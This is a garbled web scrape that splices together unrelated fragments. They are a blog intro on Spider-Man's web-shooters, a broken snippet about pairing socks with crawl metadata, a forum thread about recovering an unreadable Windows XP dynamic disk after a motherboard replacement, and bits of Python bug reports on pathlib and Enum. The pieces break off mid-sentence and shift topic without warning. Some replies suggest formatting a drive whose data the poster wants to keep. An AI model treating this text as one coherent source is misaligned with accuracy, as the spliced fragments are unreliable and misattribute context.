The Physics of Spider-Man's Webs
Perhaps the most distinguishing feature of Spider-Man is his ability to shoot webs. Now, let’s be clear. Spider-Man’s webs are a technology based super-power. Forget what you saw in previous Spider-Man movies. His webs don’t just come out of special holes in his wrists. Those movies were wrong. No, Peter Parker developed these devices using his brain (or maybe he stole them).
How to Pair Socks From A Pile Efficiently into mind to achieve an O(NlogN) }} | https://dzone.com/articles/dzone-weekly-link-roundup-18 | CC-MAIN-2018-34 | refinedweb | 326 | 56.55 |
downloading and burning the latest copy of Knoppix live CD. Boot via the CD and see if you can see the data on the drive. In fact, it doesn't have to be Knoppix any more. You might prefer something like PCLinuxOS, which is very user friendly and will set up a network connection as part of the live CD installation.
If you can, choose a method for transfer; pen stick, via the network or whatever.
Good luck.
if only the mb went down, why replace all those components. Sounds more like a short running across the system. Try putting the drive in all by itself to see if the system recognizes it. You do not have to boot to it for the bios torecognize it. If it can recognize it, you may need to formatt the drive. If it can't, you may need to rearrange the jumper/s on it or low level formatt it. If it is only the drive you are concerned abot and not the data, chuck it
righ click my computer
click on manage
click on disk management
you should see the drive shown
right click in the gray area at left
import forein disk
is it showing you a drive letter?
sorry I forgot some things to mention.
right clicking in white area gives you different option as apposed to right clicking in the gray area to the left of the disk. you may have already known this but just wanted you to know all the options.
I have a problem I think is assoiated with dynamic drives in Bootable Raid 0
I don't think Norton Internet Security likes it too much.
I keep getting an error (0xc0000142)
oscheck.exe aqccapp.exe
symcuw.exe ect.....
Also I would like any input of Going Bootable Raid 0 and keeping the Disks Basic and not changing to Dynamic. I understand the fact that you would not be able to extend the volumn into another disk but it seems to work ok that way if I am seeing it right.
Dynamic drive in XP
I installed a secondary hard drive in to XP SP2 as a dynamic drive. Later, the motherboard went down and I ended up replacing the mb, cpu, ram, graphics and primary hard drive. After all was working again I plugged in the dynamic drive only for windows to tell me that it wasn?t formatted. The drive was working fine up to the old mb going down. Primary drive is NTFS. How can I get the drive going again?
Setting the drive as a 32Mb limited drive, xp says :
Partition, basic, healthy, active, 31.50Gb, 100% free, online, not accessible, the volume does not contain a recognised file system.
Whilst just setting it as an unlimited slave, xp says:
As above but unformatted, there is an option to convert to dynamic disk.
Any idea?s ? I?ve read that dynamic drives are unreliable, maybe I shouldn?t have used it. I?d like to get the data off of it.
Thanks | http://www.techrepublic.com/forums/questions/dynamic-drive-in-xp/ | CC-MAIN-2014-41 | refinedweb | 510 | 80.62 |
It shouldn't take long for Javascript to be able to render PDF documents. Meanwhile, the somewhat opposite functionality - executing Javascript in PDF documents - is available for quite a long time already. This article is about this functionality.
Any software contains not only an actively used set of features but also a share of rarely used features. Sometimes latter set can be significant in size. You can think of features of Microsoft Word or your favorite IDE, for example. Most probably, there are enough features in them that you never used.. One of such features is the ability to use Javascript in PDF documents.
Javascript in PDF is most often used for the following tasks:
A Javascript API was developed for PDF viewers to be able to interpret Javascript code. The API was primarily developed for Adobe Acrobat family of products but alternative viewers usually also support a subset of the API.
Let's take a look at some samples.
Here is a traditional "Hello World" sample for a start. Please note that I'll use C# and Docotic.Pdf library for the samples. You can download source code of all the samples at the end of the article.
using BitMiracle.Docotic.Pdf;
namespace JavascriptInPdf
{
public static class Demo
{
public static void Main(string[] args)
{
PdfDocument pdf = new PdfDocument();
pdf.OnOpenDocument = pdf.CreateJavaScriptAction("app.alert(\"Hello CodeProject!\", 3);");
pdf.Save("Hello world.pdf");
}
}
}
You should see something like on the following screenshot if you open the PDF created by the sample in Adobe Reader:
So, what's done by the sample? Here is the essential line:
pdf.OnOpenDocument = pdf.CreateJavaScriptAction("app.alert(\"Hello CodeProject!\", 3);");
PDF supports actions. It is something that is done when an event occurs. For example, clicking on a link in a PDF document outline might trigger an action that cause viewer to open a page in the document:
There are different types of actions defined. One of the types is Javascript actions. An action of this type can be created using PdfDocument.CreateJavaScriptAction method. The method accepts Javascript code. Then the action can be attached to the OnOpenDocument event. Obviously, the event occurs when document is opened in a viewer.
PdfDocument.CreateJavaScriptAction
OnOpenDocument
Here is the Javascript code:
app.alert("Hello CodeProject!", 3);
Static class app is part of the Javascript API. This class provides methods for communicating with a PDF viewer. In particular, this class contains alert method with a number of overloads. The alert method can be used to present a modal window with a message. The code above uses the overload with optional second parameter. This parameter specifies an icon to be displayed (3 is a code for Status Icon).
app
alert
3
Let's try something more pragmatic.
There are many PDF documents with fillable forms. A document with a form can be a deposit account agreement, a visa application form, a questionnaire etc. Such documents can be conveniently filled right in a viewer and printed or saved for later use. Creators of such documents can employ Javascript to farther improve user experience.
Fillable forms often contain date fields. These fields might look like this:
Sure, a creator of a document can just add date field to the document and stop there. However, it would be nice to assist someone who will fill document later by putting current date to the date field. In most cases this will be just what is expected.
I won't go into details of how to create a date field. Let's focus on the Javascript part only. So, we need to put current date into a date field (there is three fields actually, one for day, month and year). Here is the script:
function setDay(date) {
var dayField = this.getField("day");
if (dayField.value.length == 0) {
dayField.value = util.printd("dd", date);
}
}
function setMonth(date) {
var monthField = this.getField("month");
if (monthField.value.length == 0) {
monthField.value = util.printd("date(en){MMMM}", date, true);
}
}
function setYear(date) {
var yearField = this.getField("year");
if (yearField.value.length == 0) {
yearField.value = util.printd("yyyy", date);
}
}
function setCurrentDate() {
var now = new Date();
setDay(now);
setMonth(now);
setYear(now);
}
setCurrentDate();
As you can see, there is much more code than in “Hello World” sample. Using a string for all this code is probably not very convenient because of need to escape quotes. And editing such code later might be painful because of lack of formatting. Let's put a text file with code into application resources and use another overload of CreateJavaScriptAction method.
CreateJavaScriptAction
pdf.OnOpenDocument = pdf.CreateJavaScriptAction(Resources.SetCurrentDate);
When opened, a document with the script should look like the following:
Take a closer look at following part of the code:
monthField.value = util.printd("date(en){MMMM}", date, true);
Please notice that I am using an overload of util.printd method to get localized name of the month. This works as expected in Adobe Reader but, unfortunately, other PDF viewers might not support all built-in methods of Javascript API. This should be taken into account if you are going to support anything other than Adobe Reader. Another approach is to implement custom code that does the same as util.printd.
util.printd
Please also notice that code populates a field only if it's empty. Without this additional check a following scenario might occur: a person fills the document, saves it but next time the document is opened all date fields are reset with current date.
Suppose you want to ensure that day and year are numbers. It's easy. Let's use following code for this:
function validateNumeric(event) {
var validCharacters = "0123456789";
for (var i = 0; i < event.change.length; i++) {
if (validCharacters.indexOf(event.change.charAt(i)) == -1) {
app.beep(0);
event.rc = false;
break;
}
}
}
validateNumeric(event);
PDF fields fire OnKeyPress event whenever something is typed in a field. You might want to create an action with the validation code and attach it to OnKeyPress event of fields.
OnKeyPress
PdfJavaScriptAction validateNumericAction = m_document.CreateJavaScriptAction(Resources.ValidateNumeric);
dayTextBox.OnKeyPress = validateNumericAction;
yearTextBox.OnKeyPress = validateNumericAction;
After that a person filling the form won't be able to put anything other than numbers in day and year fields. Anything getting pasted from clipboard will also be validated.
Quite often same data should be put several times in different parts of a form. In such cases some Javascript code can help to eliminate the need for this repetitive efforts.
Assume that there is a document like this:
It would be nice to have both fields synchronized.
It's possible with following Javascript method:
function synchronizeFields(sourceFieldName, destinationFieldName) {
var source = this.getField(sourceFieldName);
var destination = this.getField(destinationFieldName);
if (source != null && destination != null) {
destination.value = source.value;
}
}
The Javascript method could be used like this:
PdfDocument pdf = new PdfDocument("Names.pdf");
pdf.SharedScripts.Add(
pdf.CreateJavaScriptAction(Resources.SynchronizeFields)
);
pdf.GetControl("name0").OnLostFocus = pdf.CreateJavaScriptAction("synchronizeFields(\"name0\", \"name1\");");
pdf.GetControl("name1").OnLostFocus = pdf.CreateJavaScriptAction("synchronizeFields(\"name1\", \"name0\");");
pdf.Save("NamesModified.pdf");
This will ensure that data in both fields is the same at all times. The data is synchronized whenever any field looses focus. Please notice that synchronizeFields method is put is shared scripts collection (PdfDocument.SharedScripts). This is done to use the same code from several actions.
synchronizeFields
PdfDocument.SharedScripts
As you can see, Javascript can be used not only in web development. With some additional efforts a PDF form with Javascript code can be created. And such form could please those who will fill it almost like an application with a well thought-out UI.
Don't get me wrong, most important part of a PDF file is its content. Javascript is just a nice addition. And there are some imitations:
Also, Javascript in PDF files is a security threat. From time to time different vulnerabilities are found (and fixed) in viewers. Knowing all that don't be surprised if an opened PDF file will offer you a chess game to distract you from malicious acts getting performed in background. " />
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
To make a Fillable PDF Forms, please visit our website PDFfiller.com or you may follow this link - <a href=""></a>[<a href="" target="_blank" title="New Window">^<!
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | https://www.codeproject.com/Articles/380293/Javascript-in-PDF?msg=4244542 | CC-MAIN-2017-30 | refinedweb | 1,408 | 58.58 |
Herwin .
- Registered on: 07/18/2011
- Last connection: 07/09/2015
Activity
Reported issues: 14
06/02/2015
- 03:56 PM Ruby trunk Feature #11210 (Open): IPAddr has no public method to get the current subnet mask
- Both to_s and to_string omit the subnet mask of an IP address. The only way to query it via public methods is to manu...
01/15/2015
- 04:26 PM Ruby trunk Bug #10745 (Rejected): Special combinations of parameters in assert_equal (test/unit) may cause e...
- ~~~ruby
require 'test/unit'
require 'ipaddr'
class TestX < Test::Unit::TestCase
def test_x
assert_equal(...
08/28/2014
- 10:54 AM Ruby trunk Bug #10180 (Rejected): #to_hash vs. #to_h
- The class Hash has a method try_convert, that is documented as "Try to convert obj into a hash, using #to_hash method...
07/17/2014
- 09:50 AM Ruby trunk Feature #10052: Add parameter non_block (defaults to false) on SizedQueue#push
- The following patch should do the trick.
Another thing to consider in this file: don't mix up tabs and spaces. The...
- 08:59 AM Ruby trunk Feature #10052 (Closed): Add parameter non_block (defaults to false) on SizedQueue#push
- The implementations of Queue and SizedQueue have a method pop, where a parameter non_block would make the call raise ...
07/15/2014
- 11:08 AM Ruby trunk Bug #10035: Find.find no longer accepts Pathname type as argument
- It works in ruby-2.0.0-p481.
If you compare the files lib/find.rb from both versions, you can see that some code f...
07/14/2014
- 12:21 PM Ruby trunk Bug #10035 (Closed): Find.find no longer accepts Pathname type as argument
- In 2.1, a check for encoding of the paths parameter has been added to File.find. This works perfectly well for String...
04/14/2014
- 07:28 AM Ruby trunk Feature #9379: Support for using libxml-ruby as XML parser in xmlrpc-libs
- I guess support for Nokogiri will be possible as well, I just needed something more efficient than REXML and libXML w...
01/08/2014
- 12:32 AM Ruby trunk Feature #9379 (Closed): Support for using libxml-ruby as XML parser in xmlrpc-libs
- The default backend in the XMLRPC parser is REXML. This should work at most occasions, but it definitely isn't the fa...
01/06/2014
- 10:41 PM Ruby trunk Feature #9371 (Open): Remove NQXML from xmlrpc/parser
- In lib/xmlrpc/parser.rb a number of parsing backends exist. One of them uses the library nqxml. There is no gem for t... | https://bugs.ruby-lang.org/users/3395 | CC-MAIN-2015-32 | refinedweb | 423 | 72.97 |
Java Reflection in Action, Part 2
Editor's Note: This piece picks up where the article Java Reflection in Action left off.]
1.5 Representing types with class objects
The discussion of the methods from table 1 indicates that Java reflection uses instances of Class to represent types. For example, getMethod from listing 1 uses an array of Class to indicate the types of the parameters of the desired method. This seems fine for methods that take objects as parameters, but what about types not created by a class declaration?
Table 1.1 The methods defined by Class for method query
Consider listing 2, which shows a fragment of java.util.Vector. One method has an interface type as a parameter, another an array, and the third a primitive. To program effectively with reflection, you must know how to introspect on classes such as Vector that have methods with such parameters.
Listing 2 A fragment of java.util.Vector.
public class Vector ... { public synchronized boolean addAll( Collection c ) ... public synchronized void copyInto( Object[] anArray ) ... public synchronized Object get( int index ) ... }
Java represents primitive, array, and interface types by introducing class objects to represent them. These class objects cannot do everything that many other class objects can. For instance, you cannot create a new instance of a primitive or interface. However, such class objects are necessary for performing introspection. Table 2 shows the methods of Class that support type representation.
Table 2 Methods defined by Class that deal with type representation
The rest of this section explains in greater detail how Java represents primitive, interface, and array types using class objects. By the end of this section, you should know how to use methods such as getMethod to introspect on Vector.class for the methods shown in listing 2.
Page 1 of 3
| http://www.developer.com/java/web/article.php/3507696/Java-Reflection-in-Action-Part-2.htm | CC-MAIN-2017-09 | refinedweb | 302 | 57.27 |
Template talk:USB Device Data
Hi, I would like to add/change information regarding some DVB-T usb sticks, but I don't have the edit button on this page. The "view source" page shows me this error message: "You do not have permission to edit pages in the Template namespace." --Basic.Master 11:51, 24 March 2012 (CET)
Can't add infos about 1b80:d3a4 Afatech - here they are
I wanted to add infos about the DVB-T stick "1b80:d3a4" but couldn't as I don't have write access in the template namespace. Klaush 17:21, 1 March 2013 (CET)
Anyway, here are the infos I wanted to add, maybe someone with write access to the Template namespace can add this (hope I got the template filled out correctly):
auvisio DV-Stick 252.pro 1b80:d3a4 (shown as Afatech)
The data for the device auvisio DV-Stick 252.pro.) | https://www.linuxtv.org/wiki/index.php?title=Template_talk:USB_Device_Data&oldid=32033 | CC-MAIN-2017-17 | refinedweb | 152 | 61.19 |
import "github.com/Rolinh/errbag"
Package errbag implements an error rate based throttler. It can be used to limit function calls rate once a certain error rate threshold has been reached.
const ( // StatusThrottling indicates the errbag is throttling. StatusThrottling = iota // StatusOK indicates that all is well. StatusOK )
CallbackFunc is used as an argument to the Record() method.
ErrBag is very effective at preventing an error rate to reach a certain threshold. leakInterval. leakInterval corresponds to the time to wait, in milliseconds, before an error is discarded from the errbag. It must be equal or greater than 100, otherwise throttling will be ineffective.
Deflate needs to be called when the errbag is of no use anymore. Calling Record() with a deflated errbag will induce a panic.
Inflate needs to be called once to prepare the ErrBag. Once the ErrBag is not needed anymore, a proper call to Deflate() shall be made..
Package errbag imports 2 packages (graph) and is imported by 2 packages. Updated 2018-11-26. Refresh now. Tools for package owners. | https://godoc.org/github.com/Rolinh/errbag | CC-MAIN-2018-51 | refinedweb | 172 | 59.4 |
Hello Experts ..
Switch operator, complete code fragment below; What am I doing wrong ?
I expect I can turn the Switch operator on and off, repeatedly, and am trying to develop an application to demonstrate this. What the complete code fragment below currently does is; zero output until (approx) 3 minutes, then all output arrives at once.
fyi: the FileSource for the control port, for testing only, I was expecting to echo single tuples to that file, switch on, switch off, repeat.
What am I doing wrong ?
namespace Namespace13_Switch;
composite SW01_Switch01 { graph
stream<rstring My_String> My_Switch = Switch (My_DataInput; My_ControlInput) { param status : true; initialStatus : true; } () as My_Sink = FileSink(My_Switch) { param file : "01.OutputFile.txt"; format : line; flush : 1u; }
stream<rstring My_String> My_FileRead1 = FileSource() { param // This fellow is 20 MB, 10,000 lines. file : "01.InputFile.txt"; format : line; } stream<rstring My_String> My_DataInput = Throttle(My_FileRead1) { param rate: 100.0; }
stream<rstring My_String> My_FileRead2 = FileSource() { param file : "01.InputFile.ControlFile_Hot.txt"; format : line; hotFile : true; }
}
Answer by James Cancilla (276) | Feb 16, 2014 at 09:23 PM
Hi Daniel,
A couple of things. First, in the code you pasted, the output port of the second FileSource isn't connected to the control port of the Switch (you may have pasted some old code).
That being said, even with the FileSource connected, you will not be able to toggle the switch on and off like you want. What happens with the Switch is, whenever a tuple is received on the control port, the expression defined on the status parameter is evaluated. If the expression evaluates to true, the switch is closed (i.e. tuples flow). If false, the switch is opened (i.e. tuples are blocked). Since you have the status expression set to "true", no matter how many tuples you send to the control port, the switch will remain closed.
If you want to be able to toggle that switch on and off, you need to define an actual expression that will end up being evaluated to either true or false.
For example, I modified your Switch operator to use evaluate the value of the String on the tuple coming into the control port:
stream<rstring My_String> My_Switch = Switch(My_DataInput ; My_FileRead2) { param status : (My_FileRead2.My_String == "true") ; }
Now, all you need to do is append "true" to the hot file in order to close the switch or "false" (or anything except "true") to cause the switch to open.
You also mentioned that you don't want any tuples to flow for 3 minutes. Since you have 'initalStatus' set to true, it means the switch will be closed and tuples will begin flowing as soon as the application starts. If you don't want tuples to initially start flowing, set the initalStatus to false (or don't add param at all because the default is false).
I hope this information helps. Let me know if you have any other questions.
Answer by DanielFarrell (72) | Feb 16, 2014 at 10:02 PM
Thanks James !!
Exactly what I needed !
namespace Namespace13_Switch;
composite SW01_Switch01 { graph
// ////////////////////////////////////////////////////// // //////////////////////////////////////////////////////
stream<rstring My_String> My_Switch = Switch (My_DataInput; My_ControlInput) { param // // This expression is evaluated. True means the // switch is closed, and data will flow. // status : (My_ControlInput.My_String == "TURN_ON") ; // // Whether the switch starts closed/true (let data // flow), or open/false (do not let data flow). The // default is false (do not let data flow). // initialStatus : true; }
() as My_Sink = FileSink(My_Switch) { param file : "/My_Stuff/My_Files/13_Switch/" + "01.OutputFile.txt"; // format : line; flush : 1u; }
stream<rstring My_String> My_FileRead1 = FileSource() { param file : "/My_Stuff/My_Files/13_Switch/" + "01.InputFile.WebLog.10000Lines.txt"; format : line; }
// // A throttle. Not required, only added so that this // application doesn't speed by so fast, you can't see // it operate. // stream<rstring My_String> My_DataInput = Throttle(My_FileRead1) { param rate: 100.0; }
// // The input to the control port of our switch. Notice // we made this a 'hot' file, so we can append to it as // this Streams application is running. // // If this weren't a hot file, Streams would see the // EOF marker and never again seek to retrieve data // from this file. As a hot file, Streams will periodically // check for new input. // stream<rstring My_String> My_ControlInput = FileSource() { param file : "/My_Stuff/My_Files/13_Switch/" + "01.InputFile.ControlFile_Hot.txt"; format : line; // hotFile : true; }
}
No one has followed this question yet.
How to implement WordCount on Streams? 1 Answer
Import/Export implementation in Java Primitive Operator + Import/Export mechanism 2 Answers
How to deal with "import com.ibm.streamsx.dps.*"? 1 Answer
How to fix a TCPSource server operator that keeps connection in CLOSE_WAIT state 1 Answer
SPL::map quick copy - what's fastest? 2 Answers | https://developer.ibm.com/answers/questions/7932/switch-operator-what-am-i-doing-assuming-wrong.html | CC-MAIN-2019-43 | refinedweb | 767 | 64 |
45351/how-do-i-use-the-enumerate-function-inside-a-list
If there is list =[1,2,4,6,5] then use ...READ MORE
Hi, it is pretty simple, to be ...READ MORE
You can use sleep as below.
import time
print(" ...READ MORE
Hey, @Subi,
Regarding your query, you can go ...READ MORE
Hello @kartik,
import operator
To sort the list of ...READ MORE
suppose you have a string with a ...READ MORE
You can also use the random library's ...READ MORE
Syntax :
list. count(value)
Code:
colors = ['red', 'green', ...READ MORE
In Python "list" is the class that ...READ MORE
OR
At least 1 upper-case and 1 lower-case letter
Minimum 8 characters and Maximum 50 characters
Already have an account? Sign in. | https://www.edureka.co/community/45351/how-do-i-use-the-enumerate-function-inside-a-list?show=156479 | CC-MAIN-2022-40 | refinedweb | 127 | 79.16 |
The QCoreApplication class provides an event loop for console Qt applications. More...
#include <QCoreApplication>
Inherits QObject.
Inherited by QApplication. command line arguments which QCoreApplication's constructor should be called with are accessible using arguments(). The event loop is started with a call to exec(). Long running operations can call processEvents() to keep the application responsive... pointed to by argc and argv must stay valid for the entire lifetime of the QCoreApplication object.
Destroys the QCoreApplication object.().
Appends path to the end of the library path list. If path is empty or already in the path list, the path list is not changed.
The default path list consists of a single entry, the installation directory for plugins. The default installation directory for plugins is INSTALL/plugins, where INSTALL is the directory where Qt was installed.
See also removeLibraryPath(), libraryPaths(), and setLibraryPaths().().
Returns the file path of the application executable.
For example, if you have installed Qt in the /usr/local/qt directory, and you run the regexp example, this function will return "/usr/local/qt/examples/tools/regexp/regexp".
Warning: On Unix, this function assumes that argv[0] contains the file name of the executable (which it normally does). It also assumes that the current directory hasn't been changed by the application.
See also applicationDirPath().
Returns the list of command-line arguments.
arguments().at(0) is the program name, arguments().at(1) is the first argument, and arguments().last() is the last argument. i.e. Japanese command line arguments on a system that runs in a latin1 locale. Most modern Unix systems do not have this limitation, as they are Unicode based.
On NT-based Windows, this limitation does not apply either.
This function was introduced in Qt 4.1.
Returns true if the application objects are being destroyed; otherwise returns false.
See also startingUp(). QApplication::exec().().
Sends message through the event filter that was set by setEventFilter(). If no event filter has been set, this function returns false; otherwise, this function returns the result of the event filter function in the result parameter.
See also setEventFilter().().
This function returns true if there are pending events; otherwise returns false. Pending events can be either from the window system or posted events using postEvent().
See also QAbstractEventDispatcher::hasPendingEvents().
Adds the translation file translationFile to the list of translation files to be used for translations.
Multiple translation files can be installed. Translations are searched for in the last installed translation file on, back to the first installed translation file. The search stops as soon as a matching translation is found.
See also removeTranslator(), translate(), and QTranslator::load().
Returns a pointer to the application's QCoreApplication (or QApplication) instance. .().
This is an overloaded member function, provided for().
This is an overloaded member function, provided for convenience.().
Removes path from the library path list. If path is empty or not in the path list, the list is not changed.
See also addLibraryPath(), libraryPaths(), and setLibraryPaths()..
This is an overloaded member function, provided for convenience..
Removes the translation file translationFile from the list of translation files used by this application. (It does not delete the translation file from the file system.)
See also installTranslator(), translate(), and QObject::tr().().
Immediately dispatches all events which have been previously queued with QCore.
See also flush() and postEvent().
This is an overloaded member function, provided for convenience..
The function can return true to stop the event to be processed by Qt, or false to continue with the standard event processing.
Only one filter can be defined, but the filter can use the return value to call the previously set event filter. By default, no filter is set (i.e., the function returns 0).()..
See also QObject::tr(), installTranslator(), and QTextCodec::codecForTr().
This is an overloaded member function, provided for convenience.(). | https://doc.qt.io/archives/qtopia4.3/qcoreapplication.html | CC-MAIN-2021-10 | refinedweb | 631 | 52.46 |
#include <vtkSmoothPolyDataFilter.h>
Inheritance diagram for vtkSmoothPolyDataFilter:
vtkSmoothPolyDataFilter.h is a filter that adjusts point coordinates using Laplacian smoothing. The effect is to "relax" the mesh, making the cells better shaped and the vertices more evenly distributed. Note that this filter operates on the lines, polygons, and triangle strips composing an instance of vtkPolyData. Vertex or poly-vertex cells are never modified.
The algorithm proceeds as follows. For each vertex v, a topological and geometric analysis is performed to determine which vertices are connected to v, and which cells are connected to v. Then, a connectivity array is constructed for each vertex. (The connectivity array is a list of lists of vertices that directly attach to each vertex.) Next, an iteration phase begins over all vertices. For each vertex v, the coordinates of v are modified according to an average of the connected vertices. (A relaxation factor is available to control the amount of displacement of v). The process repeats for each vertex. This pass over the list of vertices is a single iteration. Many iterations (generally around 20 or so) are repeated until the desired result is obtained.
There are some special instance variables used to control the execution of this filter. (These ivars basically control what vertices can be smoothed, and the creation of the connectivity array.) The BoundarySmoothing ivar enables/disables the smoothing operation on vertices that are on the "boundary" of the mesh. A boundary vertex is one that is surrounded by a semi-cycle of polygons (or used by a single line).
Another important ivar is FeatureEdgeSmoothing. If this ivar is enabled, then interior vertices are classified as either "simple", "interior edge", or "fixed", and smoothed differently. (Interior vertices are manifold vertices surrounded by a cycle of polygons; or used by two line cells.) The classification is based on the number of feature edges attached to v. A feature edge occurs when the angle between the two surface normals of a polygon sharing an edge is greater than the FeatureAngle ivar. Then, vertices used by no feature edges are classified "simple", vertices used by exactly two feature edges are classified "interior edge", and all others are "fixed" vertices.
Once the classification is known, the vertices are smoothed differently. Corner (i.e., fixed) vertices are not smoothed at all. Simple vertices are smoothed as before (i.e., average of connected vertex coordinates). Interior edge vertices are smoothed only along their two connected edges, and only if the angle between the edges is less than the EdgeAngle ivar.
The total smoothing can be controlled by using two ivars. The NumberOfIterations is a cap on the maximum number of smoothing passes. The Convergence ivar is a limit on the maximum point motion. If the maximum motion during an iteration is less than Convergence, then the smoothing process terminates. (Convergence is expressed as a fraction of the diagonal of the bounding box.)
There are two instance variables that control the generation of error data. If the ivar GenerateErrorScalars is on, then a scalar value indicating the distance of each vertex from its original position is computed. If the ivar GenerateErrorVectors is on, then a vector representing change in position is computed.
Optionally you can further control the smoothing process by defining a second input: the Source. If defined, the input mesh is constrained to lie on the surface defined by the Source ivar.
Definition at line 132 of file vtkSmoothPolyDataFilter.h. | https://vtk.org/doc/release/4.0/html/classvtkSmoothPolyDataFilter.html | CC-MAIN-2021-31 | refinedweb | 572 | 57.47 |
An implementation of disposable for Dart.
Introduction
Software should be like Kleenex, strong and disposable!
- Gotta have
Dart:
This library originated as a mechinism for cleaning up resources when you're done with them.
Features
- IDisposable - interface
IAsyncDisposable - interface
Disposable - class
AsyncDisposable - class
CompositeDisposable - class
using - global function
- usingAsync - global function
40+ unit tests provide more detailed examples of usage!
Getting Started
1\. Add the following to your project's pubspec.yaml and run
pub install.
dependencies: disposable: any
2\. Add the correct import for your project.
import 'package:disposable/disposable.dart';
3\. Start using.
Naive/pointless example:
var recPort = new ReceivePort(); // Use the default constructor of both Disposable and AsyncDisposable // to do the closing, nulling and other cleanup needed.2 ish
Tech
Dart- Dartlang.org: get the JS out!
Disposable- An implementation of disposable for Dart.
Installation
License
Edited
- 26-April-2013 initial release
- 28-April-2013 bumped to 0.1.0
- 05-May-2013 updated packages and minor doc update
- 06-July-2013 fixed some async disposable tests
Credits
- Vizidrix
- Perry Birch | https://www.dartdocs.org/documentation/disposable/0.1.2/index.html | CC-MAIN-2017-26 | refinedweb | 174 | 52.56 |
Difference between order.executed.price and order.executed.value
In the quickstart documentation, I see in the notify_order function the values order.executed.price and order.executed.value, what is the difference between the two?
In the output, it seems that they always have the same values.
The default stake size is
1and it's a stock. Price and value are bound to be the same.
Thank you for your answer. I have one additional question.
In the documentation, it seems that Price and Cost are the same whether it is an executed buy or sell.
However, when I ran the code from my laptop, it seems that when the order is an Executed Sell, the cost is equal to the price of the associated buy. Is it normal?
Even if you believe in the power of magic ... nobody can know what you have executed.
Sorry for the lack of clarity. Here's my code (it is simply the code from the documentation with Facebook data):
from __future__ import (absolute_import, division, print_function, unicode_literals) import datetime # For datetime objects import os.path # To manage paths import sys # To find out the script name (in argv[0]) import backtrader as bt self.order = None def notify_order(self, order): if order.status in [order.Submitted, order.Accepted]: return]) if self.order: return if not self.position: if self.dataclose[0] < self.dataclose[-1]: if self.dataclose[-1] < self.dataclose[-2]: self.log('BUY CREATE, %.2f' % self.dataclose[0]) self.order = self.buy() else: if len(self) >= (self.bar_executed + 5): self.log('SELL CREATE, %.2f' % self.dataclose[0]) self.order = self.sell() if __name__ == '__main__': # Create a cerebro entity cerebro = bt.Cerebro() # Add a strategy cerebro.addstrategy(TestStrategy) # Datas are in a subfolder of the samples. Need to find where the script is # because it could have been called from anywhere # modpath = os.path.dirname(os.path.abspath(sys.argv[0])) # datapath = os.path.join(modpath, '../../datas/orcl-1995-2014.txt') datapath = 'FB.csv' # Create a Data Feed data = bt.feeds.YahooFinanceCSVData( dataname=datapath, # Do not pass values before this date fromdate=datetime.datetime(2018, 1, 1), # Do not pass values before this date todate=datetime.datetime(2018, 1, 30), # Do not pass values after this date reverse=False) # Add the Data Feed to Cerebro cerebro.adddata(data) # Set our desired cash start cerebro.broker.setcash(100000.0) cerebro.broker.setcommission(commission=0.001) # Print out the starting conditions print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue()) # Run over everything cerebro.run() # Print out the final result print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())
Lesson number 1 for algotrading (taught in chess and good for life in general)
Look at what you have right in front of your nose. (You can also formulate it like: "Pay attention to details")
Which means that if you open this forum, each and every time, you will see the following at the top
For code/output blocks: Use ``` (aka backtick or grave accent) in a single line before and after the block. See:
Changing.
I would have to find the discussion and commit, but I recall the semantics of value were changed early in the development phase. The sell order would return the value which would have been acquired plus the pnl. | https://community.backtrader.com/topic/1880/difference-between-order-executed-price-and-order-executed-value | CC-MAIN-2021-04 | refinedweb | 545 | 52.46 |
On 08/03/2012 04:51 PM, Igor Galić wrote:
>
>
> Right now, is your library meant to be linked with mod_lua
> or does it work with LoadFile?
It's a Lua library, so it doesn't involve httpd per se.
It would be included by mod_lua (or rather, by Lua) by writing the
following in your script:
local ap = require "aplua"
function handler(r)
ap.somestuff(r) -- do some AP stuff here
end
>
> If you were planning to integrate it into the httpd project,
> would you as above, or would it become part of mod_lua?
> (From what I gather, it wouldn't make mod_lua more "bloated")
The only "bloat" you'd get is the extra microsecond it will take to
register the functions in Lua. All the functionality is yanked straight
from httpd (which has already loaded apr, pcre etc itself), so there's
no additional memory use by including them. The only "concern", if you
will, is that there will be more functions to document.
>
> Finally, I'd like to say that all the httpd stuff is probably
> fine, the APR stuff though is a) Not namespaced as apr, and
> might be misplaced. I'm probably not competent enough to comment
> on this one, though.
>
Yes, we could create a global table, ap, for the ap stuff, and apr for
the apr stuff, or just make a table for apr, and have the rest
registered within the request_rec table.
>
> I cannot seem to be able to find this stuff…
>
The other examples I mentioned will be available in the developer docs,
as soon as I've finished making it somewhat organized.
With regards,
Daniel. | http://mail-archives.apache.org/mod_mbox/httpd-dev/201208.mbox/%[email protected]%3E | CC-MAIN-2014-15 | refinedweb | 275 | 74.73 |
Created on 2019-12-17 23:37 by andrewni, last changed 2019-12-18 17:48 by ethan.furman. This issue is now closed.
import os
import pathlib
import enum
class MyEnum(str, enum.Enum):
RED = 'red'
# this resolves to: '/Users/niandrew/MyEnum.RED'
# EXPECTED: '/Users/niandrew/red'
str(pathlib.Path.home() / MyEnum.RED)
# this resolves to: '/Users/niandrew/red'
os.path.join(pathlib.Path.home(), MyEnum.RED)
As per the fspath PEP the below precedence is set. So for the enum inheriting from str the object itself is returned and MyEnum.RED.__str__ is used returning MyEnum.RED. You can remove inheritance from str and implement __fspath__ for your enum class to be used as per fspath protocol.
> If the object is str or bytes, then allow it to pass through with
an incremented refcount. If the object defines __fspath__(), then
return the result of that method. All other types raise a TypeError.
# bpo39081.py
import os
import pathlib
import enum
class MyEnum(enum.Enum):
RED = 'red'
def __fspath__(self):
return self.name
print(os.fspath(MyEnum.RED))
print(pathlib.Path.home() / MyEnum.RED)
$ python3.8 bpo39081.py
RED
/Users/kasingar/RED
Karthikeyan is right and this is working as expected. If you want the semantics you're after you can either implement __fspath__ as was suggested or get the 'value' attribute of the enum when constructing your path.
The other option is to continue to inherit from `str`, but override the `__str__` method:
class MyEnum(str, enum.Enum):
#
def __str__(self):
return self.value | https://bugs.python.org/issue39081 | CC-MAIN-2021-21 | refinedweb | 256 | 60.51 |
Created on 2012-03-17 19:04 by Jakob.Bowyer, last changed 2015-11-12 10:05 by serhiy.storchaka. This issue is now closed.
Running:
